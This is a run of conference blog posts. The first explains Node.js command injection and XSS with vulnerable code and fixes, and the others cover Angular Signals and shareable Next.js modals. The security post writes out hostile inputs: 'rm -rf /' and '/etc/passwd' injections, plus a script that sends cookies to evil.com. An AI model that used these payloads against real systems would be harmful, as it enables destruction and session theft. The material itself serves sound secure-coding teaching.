  2. Uses an allowlist approach for sortField, restricting possible values.
  3. Avoids exposing detailed error information to potential attackers.

Command Injection

Overview: Command injection occurs when an attacker can execute arbitrary commands on the host operating system via a vulnerable application. This typically happens when user input is passed directly to a system shell.

Example: Consider a Node.js application that uses the exec function to list files in a directory:

const { exec } = require('child_process');

const dir = req.body.dir;

exec(`ls ${dir}`, (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

If an attacker inputs ; rm -rf /, the command becomes:

ls ; rm -rf /

This command lists the directory contents and then deletes the root directory, causing significant damage.

Solution: To prevent command injection, avoid using exec with unsanitized user input. Use safer alternatives like execFile or spawn, which do not invoke a shell.

const { execFile } = require('child_process');

const dir = req.body.dir;

execFile('ls', [dir], (err, stdout, stderr) => {

  if (err) throw err;

  // Process stdout

});

Scenario 2: Consider a Node.js application that allows users to ping a host to check connectivity:

const express = require('express');

const { exec } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // VULNERABLE CODE: Direct concatenation of user input into command

  const command = 'ping -c 4 ' + hostInput;

  

  exec(command, (error, stdout, stderr) => {

    if (error) {

      res.status(500).send(`Error: ${stderr}`);

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

The Attack

An attacker could exploit this vulnerability by providing a malicious input:

/ping?host=google.com; cat /etc/passwd

The resulting command becomes:

ping -c 4 google.com; cat /etc/passwd

This would execute the ping command followed by displaying the contents of the system’s password file, potentially exposing sensitive information.

/ping?host=;rm -rf /*

Which attempts to delete all files on the system (assuming adequate permissions).

Secure Solution

Here’s how to fix the vulnerability:

const express = require('express');

const { execFile } = require('child_process');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.get('/ping', (req, res) => {

  const hostInput = req.query.host;

  

  // Input validation: Basic hostname format check

  if (!/^[a-zA-Z0-9][a-zA-Z0-9\.-]+$/.test(hostInput)) {

    return res.status(400).send('Invalid hostname format');

  }

  

  // SECURE CODE: Using execFile which doesn't invoke shell

  execFile('ping', ['-c', '4', hostInput], (error, stdout, stderr) => {

    if (error) {

      res.status(500).send('Error executing command');

      return;

    }

    res.send(`<pre>${stdout}</pre>`);

  });

});

app.listen(3000);

Best Practices to Prevent Command Injection

  1. Avoid shell execution: Use execFile or spawn instead of exec when possible, as they don’t invoke a shell.
  2. Input validation: Implement strict validation of user input using regex or other validation methods.
  3. Allowlists: Use allowlists to restrict inputs to known-good values.
  4. Use built-in APIs: When possible, use Node.js built-in modules instead of executing system commands.
  5. Principle of least privilege: Run your Node.js application with minimal required system permissions.

iJS Newsletter

Keep up with JavaScript’s latest news!

Cross-Site Scripting (XSS) Attacks

This is a kind of security vulnerability that is most often seen in web applications. It allows attackers to inject malicious scripts into web pages that other users view. These scripts can then be executed in the context of the victim’s browser, resulting in potential data theft, session hijacking and other malicious activities. An XSS vulnerability occurs when an application uses unvalidated input in creating a web page.

How XSS Occurs

XSS attacks happen when the attacker is able to inject malicious scripts into a web application and the scripts get executed in the victim’s browser, thus making the attacker perform actions on behalf of the user or even steal sensitive information.

How XSS Occurs in Node.js

XSS attacks can occur in Node.js applications when user input is not properly sanitized or encoded before being included in the HTML output. This can happen in various scenarios, such as displaying user comments, search results, or any other dynamic content.

Types of XSS Attacks

XSS vulnerabilities can be classified into three primary types:

  • Reflected XSS: The malicious script is reflected off a web server, such as in an error message or search result, and is immediately executed by the user’s browser.
  • Stored XSS: The malicious script is stored on the server, such as in a database, and is executed whenever the data is retrieved and displayed to users.
  • DOM-Based XSS: The vulnerability exists in the client-side code rather than the server-side code, and the malicious script is executed as a result of modifying the DOM environment.

Scenario 1: Consider a Node.js application that displays user comments without proper sanitization:

const express = require('express');

const app = express();

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = req.body.comment;

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

If an attacker submits a comment containing a malicious script, such as:

<script>alert('XSS');</script>

The application will render the comment as:

<div>

  <p>User comment: <script>alert('XSS');</script></p>

</div>

When another user views the comment, the script will execute, displaying an alert box with the message “XSS”.

Prevention Techniques

To prevent XSS attacks in Node.js applications, developers should implement the following techniques:

  • Input Validation: Ensure that all user inputs are validated to conform to expected formats. Reject any input that contains potentially malicious content.
  • Output Encoding: Encode user inputs before displaying them in the browser. This ensures that any special characters are treated as text rather than executable code.
onst express = require('express');

const app = express();

const escapeHtml = require('escape-html');

app.use(express.urlencoded({ extended: true }));

app.post('/comment', (req, res) => {

  const comment = escapeHtml(req.body.comment);

  res.send(`<div><p>User comment: ${comment}</p></div>`);

});

app.listen(3000, () => {

  console.log('Server is running on port 3000');

});

Here, escapeHtml is a function that converts special characters to their HTML entity equivalents.

  • Content Security Policy (CSP): Implement a Content Security Policy to restrict the sources from which scripts can be loaded. This helps prevent the execution of malicious scripts.
  • HTTP-Only and Secure Cookies: Use HTTP-only and secure flags for cookies to prevent them from being accessed by malicious scripts.
res.cookie('session', sessionId, { httpOnly: true, secure: true });

Scenario 2: Reflected XSS in a Search Feature

Here’s a simple Express application with an XSS vulnerability:

const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q;

  

  // VULNERABLE CODE: Directly embedding user input in HTML response

  res.send(`

    <h1>Search Results for: ${searchTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

app.listen(3000);

The Attack

An attacker could craft a malicious URL:

/search?q=<script>document.location='https://evil.com/stealinfo.php?cookie='+document.cookie</script>

When a victim visits this URL, the script executes in their browser, sending their cookies to the attacker’s server. This could lead to session hijacking and account takeover.

Secure Solutions

  1. Output Encoding
const express = require('express');

const app = express();

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || ''; 

  // SECURE CODE: Encoding special characters

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;')

    .replace(/"/g, '&quot;')

    .replace(/'/g, '&#039;');

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

2. Using Template Engines

const express = require('express');

const app = express();

app.set('view engine', 'ejs');

app.set('views', './views');

app.get('/search', (req, res) => {

  const searchTerm = req.query.q || '';

  

  // SECURE CODE: Using EJS template engine with automatic escaping

  res.render('search', { searchTerm });

});

3. Using Content Security Policy

const express = require('express');

const helmet = require('helmet');

const app = express();

// Add Content Security Policy headers

app.use(helmet.contentSecurityPolicy({

  directives: {

    defaultSrc: ["'self'"],

    scriptSrc: ["'self'"],

    styleSrc: ["'self'"],

  }

}));

app.get('/search', (req, res) => {

  // Even with encoding, adding CSP provides defense in depth

  const searchTerm = req.query.q || '';

  const encodedTerm = searchTerm

    .replace(/&/g, '&amp;')

    .replace(/</g, '&lt;')

    .replace(/>/g, '&gt;');

  

  res.send(`

    <h1>Search Results for: ${encodedTerm}</h1>

    <p>No results found.</p>

    <a href="/">Back to home</a>

  `);

});

Best Practices to Prevent XSS

  • Context-appropriate encoding: Only display output encoded according to what it is to be used for HTML, JavaScript, CSS, or URL.
  • Use security libraries: When using HTML, it’s better to use DOMPurify, js-xss or sanitize-html.
  • Content Security Policy: CSP headers can also be used to restrict where scripts come from and when they can be executed.
  • Use modern frameworks: Some frameworks like React, Vue or Angular will encode output for you.
  • X-XSS-Protection: This header should be used to enable browser’s built in XSS filters.
  • HttpOnly cookies: Designate sensitive cookies as HttpOnly to prevent them from being accessed by JavaScript.

Following these practices will go a long way in ensuring that your Node.js applications are secure against XSS attacks, which are still very frequent in web applications.

EVERYTHING AROUND NODEJS

Explore the iJS Node.js & Backend Track

Conclusion

Security requires a comprehensive approach addressing all potential vulnerabilities. We discussed two of the most common threats that affect web applications:

SQL Injection

We explained how unsanitized user input in database queries can result in unauthorized data access or manipulation. To protect your applications:

  • Instead of string concatenation, use parameterized queries.
  • Secure ORMs are also available.
  • All user inputs should be validated before processing.
  • Apply the principle of least privilege for database access

Cross-Site Scripting (XSS)

We looked at how reflected XSS in a search feature can allow attackers to inject malicious scripts that are executed in users’ browsers. Essential defensive measures include:

  • Encoding of output where appropriate
  • Security libraries for HTML sanitization
  • Content Security Policy headers
  • Frameworks that offer protection against XSS
  • HttpOnly cookies for sensitive data.

The post Common Vulnerabilities in Node.js Web Applications appeared first on International JavaScript Conference.

]]>
Professional Tips for Using Signals in Angular https://javascript-conference.com/blog/signals-angular-tips/ Wed, 05 Mar 2025 13:30:01 +0000 https://javascript-conference.com/?p=107575 Signals in Angular offer a powerful yet simple reactive programming model, but leveraging them effectively requires a solid understanding of best practices. In this guide, we explore expert techniques for using Signals in unidirectional data flow, integrating them with RxJS, avoiding race conditions, and optimizing performance. Whether you're new to Signals or looking to refine your approach, these professional tips will help you build seamless and efficient Angular applications.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
The new Signals in Angular are a simple reactive building block. However, as is so often the case, the devil is in the detail. In this article, I will give three tips to help you use Signals in a more straightforward way. The examples used for this can be found here.

Guiding theory: Unidirectional data flow with signals

The approach for establishing a unidirectional data flow (Fig. 1) serves as the guiding theory for my three tips.

Fig. 1: Signals in Angular-Unidirectional data flow with a store

Fig. 1: Unidirectional data flow with a store

Handlers for UI events delegate to the store. I use the abstract term “intention”, since this process is different for different stores. With the Redux-based NgRx store, actions are dispatched; whereas with the lightweight NgRx Signal store, the component calls a method offered by the store.

The store executes synchronous or asynchronous tasks. These usually lead to a status change, which the application transports to the views of the individual components with signals. As part of this data flow, the state can be projected onto view models using computed, i.e. onto data structures that represent the view of individual use cases on the state.

This approach is based on the fact that signals are primarily suitable for informing the view synchronously about data and data changes. They are less suitable for asynchronous tasks and for representing events. For one, they don’t offer a simple way of dealing with overlapping asynchronous requests and the resulting race conditions. Furthermore, they cannot directly represent error states. Second, signals ignore the resulting intermediate states in the case of directly consecutive value changes. This desired property is called “glitch free”.

For example, if a signal changes from 1 to 2 and immediately afterwards from 2 to 3, the consumer only receives a notification about the 3. This is also conducive to data binding performance, especially as updating with intermediate results would result in an unnecessary performance overhead.

iJS Newsletter

Keep up with JavaScript’s latest news!

Tip 1: Signals harmonize with RxJS

Signals are deliberately kept simple. That’s why it offers fewer options than RxJS, which has been established in the Angular world for years. Thanks to the RxJS interop that Angular provides, the best of both worlds can be combined. Listing 1 demonstrates this. It converts the signals from and to into observables and implements a typeahead based on them. To do this, it uses the operators filter, debounceTime and switchMap provided by RxJS. The latter prevents race conditions for overlapping requests by only using the most recent request. SwitchMap aborts requests that have already been started, unless they have already been completed.

Listing 1

@Component({
  selector: 'app-desserts',
  standalone: true,
  imports: [DessertCardComponent, FormsModule, JsonPipe],
  templateUrl: './desserts.component.html',
  styleUrl: './desserts.component.css',
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class DessertsComponent {
  #dessertService = inject(DessertService);
  #ratingService = inject(RatingService);
  #toastService = inject(ToastService);

  originalName = signal('');
  englishName = signal('Cake');
  loading = signal(false);

  ratings = signal<DessertIdToRatingMap>({});
  ratedDesserts = computed(() => this.toRated(this.desserts(), this.ratings()));

  originalName$ = toObservable(this.originalName);
  englishName$ = toObservable(this.englishName);

  desserts$ = combineLatest({
    originalName: this.originalName$,
    englishName: this.englishName$,
  }).pipe(
    filter((c) => c.originalName.length >= 3 || c.englishName.length >= 3),
    debounceTime(300),
    tap(() => this.loading.set(true)),
    switchMap((c) =>
      this.#dessertService.find(c).pipe(
        catchError((error) => {
          this.#toastService.show('Error loading desserts!');
          console.error(error);
          return of([]);
        }),
      ),
    ),
    tap(() => this.loading.set(false)),
  );

  desserts = toSignal(this.desserts$, {
    initialValue: [],
  });
  
  […]
}

At the end, the resulting observable is converted into a signal so that the application can continue with the new Signals API. For performance reasons, the application should not switch between the two worlds too frequently.

In contrast to Figure 1, no store is used. Both the intention and the asynchronous action take place in the reactive data flow. If the data flow were outsourced to a service and the loaded data were shared with the shareReplay operator, this service could be regarded as a simple store. However, in line with Figure 1, the component already hands over the execution of asynchronous tasks in the expansion stage shown and receives signals at the end.

EVERYTHING AROUND ANGULAR

Explore the iJS Angular Development Track

RxJS in Stores

RxJS is also frequently used in stores, like in NgRx in combination with Effects. Instead, the NgRx Signal Store offers its own reactive methods that can be defined with rxMethod (Listing 2).

Listing 2

export const DessertStore = signalStore(
  { providedIn: 'root' },
  withState({
    filter: {
      originalName: '',
      englishName: 'Cake',
    },
    loading: false,
    ratings: {} as DessertIdToRatingMap,
    desserts: [] as Dessert[],
  }),
  […]
  withMethods(
    (
      store,
      dessertService = inject(DessertService),
      toastService = inject(ToastService),
    ) => ({
      
      […]
      loadDessertsByFilter: rxMethod<DessertFilter>(
        pipe(
          filter(
            (f) => f.originalName.length >= 3 || f.englishName.length >= 3,
          ),
          debounceTime(300),
          tap(() => patchState(store, { loading: true })),
          switchMap((f) =>
            dessertService.find(f).pipe(
              tapResponse({
                next: (desserts) => {
                  patchState(store, { desserts, loading: false });
                },
                error: (error) => {
                  toastService.show('Error loading desserts!');
                  console.error(error);
                  patchState(store, { loading: false });
                },
              }),
            ),
          ),
        ),
      ),
    }),
  ),
  withHooks({
    onInit(store) {
      const filter = store.filter;
      store.loadDessertsByFilter(filter);
    },
  }),
);

This example sets up a reactive method loadDessertsByFilter in the store. As it is defined with rxMethod, it receives an observable. The values of this observable pass through the defined pipe. As rxMethod automatically logs on to this observable, the application code must receive the result of the data flow using tap or tabResponse. The latter is an operator from the @ngrx/operators package that combines the functionality of tap, catchError and finalize.

The consumer of a reactive method can pass a corresponding observable as well as a signal or a specific value. The onInit hook shown passes the filter signal. This means all values that the signal gradually picks up pass through the pipe in loadDessertsByFilter. This is where the glitch-free property comes into play.

It is interesting to note that rxMethod can also be used outside the signal store by design. For example, a component could use it to set up a reactive method.

Tip 2: Avoiding race conditions

Overlapping, asynchronous operations usually lead to undesirable race conditions. If users search for two different desserts in quick succession, both results are displayed one after the other. One of the two only flashes briefly before the other replaces it. Due to the asynchronous nature, the order of the search queries doesn’t have to match each of the results obtained.

To prevent this confusing behavior, RxJS offers a few flattening operators:

  • switchMap
  • mergeMap
  • concatMap
  • exhaustMap

These operators differ in how they deal with overlapping requests. The switchMap only deals with the last search request. It cancels any queries that are already running when a new query arrives. This behavior corresponds to what users intuitively expect when working with search filters.

The mergeMap and concatMap operators execute all requests: the former in parallel and the latter sequentially. The exhaustMap operator ignores further requests as long as one is running. These options are another reason for using RxJS and for the RxJS interop and rxMethod.

Another strategy often used in addition or as an alternative is a flag that indicates if the application is currently communicating with the backend.

Listing 3

loadRatings(): void {
  patchState(store, { loading: true });

  ratingService.loadExpertRatings().subscribe({
    next: (ratings) => {
      patchState(store, { ratings, loading: false });
    },
    error: (error) => {
      patchState(store, { loading: false });
      toastService.show('Error loading ratings!');
      console.error(error);
    },
  });
},

Depending on the flag’s value, the application can display a loading indicator or deactivate the respective button. The latter is counterproductive or even impossible with a highly reactive UI if the application can manage without an explicit button.

Tip 3: Signals as triggers

As mentioned earlier, Signals are especially suitable for transporting data to the view, like what’s seen on the right in Figure 1. Real events, UI events, or events displayed with RxJS are the better solution for transmitting an intention. There are several reasons why: First, Signals’ glitch-free property can reduce consecutive changes to the last change.

Consumers must subscribe to the Signal in order to be able to react to value changes. This requires an effect that triggers the desired action and writes the result to a signal. Effects that write to Signals are not welcome. By default, they are even penalized by Angular with an exception. The Angular team wants to avoid confusing reactive chains – changes that lead to changes, which in turn, lead to further changes.

On the other hand, Angular is converting more and more APIs to signals. One example is Signals that can be bound to form fields or Signals that represent passed values (inputs). In most cases, you could argue that instead of listening for the Signal, you can also use the event that led to the Signal change. But in some cases, this is a detour that bypasses the new signal-based APIs.

Listing 4 shows an example of a component that receives the ID of a data set to be displayed as an input signal. The router takes this ID from a routing parameter. This is possible with the relatively new feature withComponentInputBinding.

Listing 4

@Component({ […] })
export class DessertDetailComponent implements OnChanges {

  store = inject(DessertDetailStore);

  dessert = this.store.dessert;
  loading = this.store.loading;

  id = input.required({
    transform: numberAttribute
  });
  
  […]
}

This component’s template lets you scroll between the data records. This logic is deliberately implemented very simply for this example:

<button [routerLink]="['..', id() + 1]" >
  Next
</button>

When scrolling, the input signal id receives a new value. Now, the question arises as to how to trigger the loading of the respective data set in the event of this kind of change. The classic procedure is using the live cycle hook ngOnChanges:

ngOnChanges(): void {
  const id = this.id();
  this.store.load(id);
}

For the time being, there’s nothing wrong with this. However, the planned signal-based components will no longer offer this lifecycle hook. The RFC provides using effects as a replacement.

To escape this dilemma, an rxMethod (e.g. offered by a signal store) can be used:

constructor() {
  this.store.rxLoad(this.id);
}

It should be noted that the constructor transfers the entire signal and not just its current value. The rxMethod subscribes to this Signal and forwards its values to an observable that is used within the rxMethod.

If you don’t want to use the signal store, you can instead use the RxJS interop discussed above and convert the signal into an observable with toObservable.

If you don’t have a reactive method to hand, you might be tempted to define an effect for this task:

constructor() {
  effect(() => {
    this.store.load(this.id());
  });
}

Unfortunately, this leads to the exception in Figure 2.

Fig. 2: Signals in Angular-Error message when using effect.

Fig. 2: Error message when using effect

This problem arises because the entire load method that writes a Signal in the store is executed in the reactive context of the effect. This means that Angular recognizes an effect that writes to a Signal. This has to be prevented by default for the reasons above. It also means that Angular triggers the effect again even if a Signal read in load changes.

Both problems can be prevented by using the untracked function (Listing 5).

Listing 5

constructor() {
  // try to avoid this
  effect(() => {
    const id = this.id();
    untracked(() => {
      this.store.load(id);
    });
  });
}

With this common pattern, untracked ensures that the reactive context does not spill over to the load method. It can write to Signals and the effect doesn’t register for Signals that read load. Angular only triggers the effect again when the Signal id changes, especially since it reads it outside of untracked.

Unfortunately, this code is not especially easy to read. It’s a good idea to hide it behind a helper function:

constructor() {
  explicitEffect(this.id, (id) => {
    this.store.load(id);
  });
}

The created auxiliary function explicitEffect receives a signal and subscribes to it with an effect. The effect triggers the transferred lambda expression using untracked (Listing 6).

Listing 6

import { Signal, effect, untracked } from "@angular/core";

export function explicitEffect<T>(source: Signal<T>, action: (value: T) => void) {
  effect(() => {
    const s = source();
    untracked(() => {
      action(s)
    });
  });
}

Interestingly, the explicit definition of Signals to be obeyed corresponds to the standard behavior of effects in other frameworks, like Solid. The combination of effect and untracked shown is also used in many libraries. Examples include the classic NgRx store, the RxJS interop mentioned above, the rxMethod, or the open source library ngxtension, which offers many extra functions for Signals.

iJS Newsletter

Keep up with JavaScript’s latest news!

To summarize

RxJS and Signals harmonize wonderfully together and the RxJS interop from Angular gives us the best of both worlds. Using RxJS is recommended for representing events. For processing asynchronous tasks, RxJS or stores (which can be based on RxJS) are recommended. The synchronous transport of data to the view should be handled by Signals. Together, RxJS, stores, and Signals are the building blocks for establishing a unidirectional data flow.

The flattening operators in RxJS can also elegantly avoid race conditions. Alternatively or in addition to this, flags can be used to indicate if a request is currently in progress at the backend.

Even if Signals weren’t primarily created to display events, there are cases when you want to react to changes in a Signal. This is the case with framework APIs based on Signals. In addition to the RxJS interop, the rxMethod from the Signal Store can also be used. Another option is the effect/untracked pattern for implementing effects that only react to explicitly named Signals.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
Shareable Modals in Next.js: URL-Synced Overlays Made Easy https://javascript-conference.com/blog/shareable-modals-nextjs/ Mon, 17 Feb 2025 14:03:07 +0000 https://javascript-conference.com/?p=107476 Modals are a cornerstone of interactive web applications. However, managing their state, making them shareable, and preserving navigation can be complex. Next.js simplifies this with intercepting and parallel routes, enabling deep-linked, URL-synced modals. Together, we’ll build a dynamic feedback modal system with TailwindCSS that can be accessed, shared, and navigated effortlessly, improving both user experience and developer productivity.

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
Modals are essential UI components in web applications, often used for tasks such as displaying additional information, capturing user input, or confirming actions. However, traditional approaches to managing modals present challenges such as maintaining state, handling navigation, and ensuring that context is preserved on refresh.

With Next.js, intercepting and parallel routes introduce a powerful way to make modals URL-synced and shareable. This enables seamless deep linking, backward navigation to close modals, and forward navigation to reopen them – all without compromising the user experience.

In this article, we’ll walk through the process of building a dynamic feedback modal in Next.js. Along the way, we’ll explore advanced techniques, accessibility best practices, and tips for improving your modals for production-ready applications.

Why shareable modals matter

Modals have become an essential feature of modern web applications. Whether it’s a login form, product preview, or feedback submission, modals allow users to interact with your application without leaving the current page. But as simple as modals may seem, traditional implementations can present significant challenges for both users and developers.

Challenges with traditional modals

1. State management in large applications:

Most modal implementations rely on the client-side state to keep track of whether the modal is open or closed. In small applications, this is manageable using tools like React’s “useState” or the Context API. However, in larger applications with multiple modals, this approach becomes complex and error-prone. For example:

  • You may need to manage overlapping modal states across different components.
  • Global state management solutions such as Redux or Zustand can help, but add unnecessary complexity for something as simple as opening or closing a modal

2. Refresh behaviour:

Traditional modals lose their state when the page is refreshed. For example:

  • A user clicks a “Give Feedback” button, opening a modal.
  • They refresh the page, expecting the modal to stay open, but instead, it closes because the client-side state is reset. This disrupts the user experience, forcing users to repeat actions or lose their place in the workflow.

3. Inability to share modal states via URLs:
Consider a scenario where a user wants to share a particular modal with a colleague. With traditional client-side modals, there’s no URL representing the modal state, so the user can’t share or bookmark the modal. This makes the application less versatile and harder to navigate for users who expect modern, shareable interfaces.

How Next.js solves these challenges

Next.js provides a routing system that integrates seamlessly with modals, solving the challenges above. By leveraging features like intercepting routes and parallel routes, you can implement modals that are URL-synced, shareable, and persistent.

1.URL-based state for deep linking:
In Next.js, modal states can be tied directly to URLs. For example:

  • Navigating to /feedback can open a feedback form modal.
  • This URL can be shared or bookmarked, and refreshing the page will keep the modal open.
    This is achieved by associating modal components with specific routes in your file system, giving the modal a dedicated URL.

2.Preserving context and consistent navigation:
Unlike traditional modals, Next.js maintains navigation consistency. For example:

  • Pressing the back button closes the modal instead of navigating to the previous page.
  • Navigating forward reopens the modal, maintaining the user flow.
    These behaviours are automatically handled by Next.js’ routing system, reducing the need for custom logic and improving the user experience.

iJS Newsletter

Keep up with JavaScript’s latest news!

Next.js functions for creating shareable modals

Intercepting routes

Intercepting routes in Next.js allows you to “intercept” navigation to a specific route and render additional UI, such as a modal, without replacing the current page content. This is done using a special folder naming convention in your file system.

Implementation:

Intercepting route folder:

  • To create an interception route, use a folder prefixed with (.).
  • For example, if you wanted to intercept navigation to “/feedback” and display it as a modal, you would create the following structure:
  • app 
    ├── @modal 
    ├── (.)feedback 
    │   │   └── page.tsx 
    │   └── default.tsx 
    ├── feedback 
    │   └── page.tsx  
  • app/feedback/page.tsx renders the full-page version of the feedback form.
  • app/@modal/(.)feedback/page.tsx renders the modal version.

Route behaviour:

  • Navigating directly to /feedback will render the full page (app/feedback/page.tsx).
  • Clicking on a “Give Feedback” button navigates to /feedback, but renders the modal (app/@modal/(.)feedback/page.tsx).

Example modal file:

Listing 1: 

import { Modal } from '@/components/modal';  
export default function FeedbackModal() {  
  return (  
    <Modal>  
      <h2 className="text-lg font-bold">Give Feedback</h2>  
      <form className="mt-4 flex flex-col gap-4">  
        <textarea  
          placeholder="Your feedback..."  
          className="border rounded-lg p-2"  
        />  
        <button  
          type="submit"  
          className="bg-blue-500 text-white py-2 px-4 rounded-lg"  
        >  
          Submit  
        </button>  
      </form>  
    </Modal>  
  );  
}  

Parallel routes

Parallel routes allow multiple routes to be rendered simultaneously in different “slots” of the UI. This feature is particularly useful for rendering modals without disrupting the main layout.

Implementation:

Create a slot:

  • Parallel routes are implemented using folders prefixed with @. For example, @modal defines a slot for modal content.
  • In the root layout, you can include the modal slot next to the main page content.

Example layout file:

Listing 2:

// app/layout.tsx
import "./globals.css";

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>
        <div>{modal}</div>
        <main>{children}</main>
      </body>
    </html>
  );
}

Fallback content:

  • Define a default.tsx file in the @modal folder to specify the fallback content when the modal is not active.

Listing 3:

// app/@modal/default.tsx
export default function Default() {
  return null; // No modal by default
}

 

Why these features matter

Intercepting routes in Next.js enable dynamic modal rendering without disrupting the layout of the main application. They allow you to associate specific modal components with their own URLs, making it possible to implement deep linking and sharing for modals. This ensures that users can navigate directly to a specific modal or share its state via a URL.

Parallel routes, on the other hand, separate the rendering logic of modals from the rest of the application. By isolating modal behaviour into its own designated slot, parallel routes simplify development and improve maintainability. This separation ensures that modals can be rendered independently, without interfering with the layout or functionality of other parts of the application.

By combining intercepting and parallel routes, Next.js transforms the way modals are implemented. These features make modals more user-friendly by supporting modern navigation patterns and sharing capabilities, while also enhancing developer efficiency through cleaner, more modular code.

iJS Newsletter

Keep up with JavaScript’s latest news!

Building a feedback modal in Next.js with TailwindCSS

Step 1: Setting up the /feedback route

The /feedback route serves as the main feedback page. TailwindCSS is used to style the form and layout.

Listing 4:

// app/feedback/page.tsx
export default function FeedbackPage() {
  return (
    <main className="flex flex-col items-center justify-center min-h-screen bg-gray-100">
      <h1 className="text-2xl font-bold text-gray-800">Feedback</h1>
      <p className="text-gray-600">We’d love to hear your thoughts!</p>
      <form className="mt-4 flex flex-col gap-4 w-full max-w-md">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </main>
  );
}

Step 2: Define the @modal slot

The @modal slot ensures that no modal is rendered unless explicitly triggered.

Listing 5:

// app/@modal/default.tsx
export default function Default() {
  return null; // Ensures the modal is not active by default
}

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Step 3: Implement the modal in the /(.)feedback folder

This step uses the intercepting route pattern (.) to render the modal in the @modal slot.

Listing 6:

// app/@modal/(.)feedback/page.tsx
import { Modal } from '@/components/modal';

export default function FeedbackModal() {
  return (
    <Modal>
      <h2 className="text-lg font-bold text-gray-800">Give Feedback</h2>
      <form className="mt-4 flex flex-col gap-4">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </Modal>
  );
}

Step 4: Create the reusable modal component

The modal is styled using TailwindCSS for a modern and accessible design.

Listing 7:

// components/modal.tsx
'use client';

import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();

  return (
    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Step 5: Update the layout for parallel routing

In the layout, the @modal slot is rendered next to the primary children

Listing 8:

// app/layout.tsx
import Link from 'next/link';
import './globals.css';

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body className="bg-gray-100 text-gray-900">
        <nav className="bg-gray-800 p-4 text-white">
          <Link
            href="/feedback"
            className="hover:underline text-white"
          >
            Give Feedback
          </Link>
        </nav>
        <div>{modal}</div>
        <main className="p-4">{children}</main>
      </body>
    </html>
  );
}

You can find the complete implementation using TailwindCSS, including accessibility enhancements, on my GitHub repository.

Advanced features and enhancements

Accessibility improvements

Accessibility is critical when creating modals. Without proper implementation, modals can confuse users, especially those who rely on screen readers or keyboard navigation. Here are some key practices to ensure that your modal is accessible:

Focus management

When a modal is opened, the focus should be moved to the first interactive element within the modal, and users should not be able to interact with elements outside the modal. In addition, when the modal is closed, the focus should return to the element that triggered it.

This can be achieved by using JavaScript to trap focus within the modal:

Listing 9:

// Updated Modal Component with Focus Management
'use client';

import { useEffect, useRef } from 'react';
import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();
  const modalRef = useRef<HTMLDivElement>(null);

  useEffect(() => {
    const focusableElements = modalRef.current?.querySelectorAll(
      'button, [href], input, textarea, select, [tabindex]:not([tabindex="-1"])'
    );
    const firstElement = focusableElements?.[0] as HTMLElement;
    const lastElement = focusableElements?.[focusableElements.length - 1] as HTMLElement;

    // Trap focus within the modal
    function handleTab(e: KeyboardEvent) {
      if (!focusableElements || focusableElements.length === 0) return;

      if (e.key === 'Tab') {
        if (e.shiftKey && document.activeElement === firstElement) {
          e.preventDefault();
          lastElement?.focus();
        } else if (!e.shiftKey && document.activeElement === lastElement) {
          e.preventDefault();
          firstElement?.focus();
        }
      }
    }

    // Set initial focus to the first interactive element
    firstElement?.focus();

    window.addEventListener('keydown', handleTab);
    return () => window.removeEventListener('keydown', handleTab);
  }, []);

  return (
    <div
      ref={modalRef}
      role="dialog"
      aria-modal="true"
      className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50"
    >
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Focus trapping is essential for maintaining a seamless and accessible user experience when working with modals. It ensures that users cannot accidentally navigate or interact with elements outside the modal while it is open, preventing confusion and unintended actions. Additionally, returning focus to the element that triggered the modal provides a smooth transition when the modal is closed, helping users reorient themselves and continue interacting with the application without disruption. These practices enhance both usability and accessibility, creating a more polished and user-friendly interface.

ARIA attributes

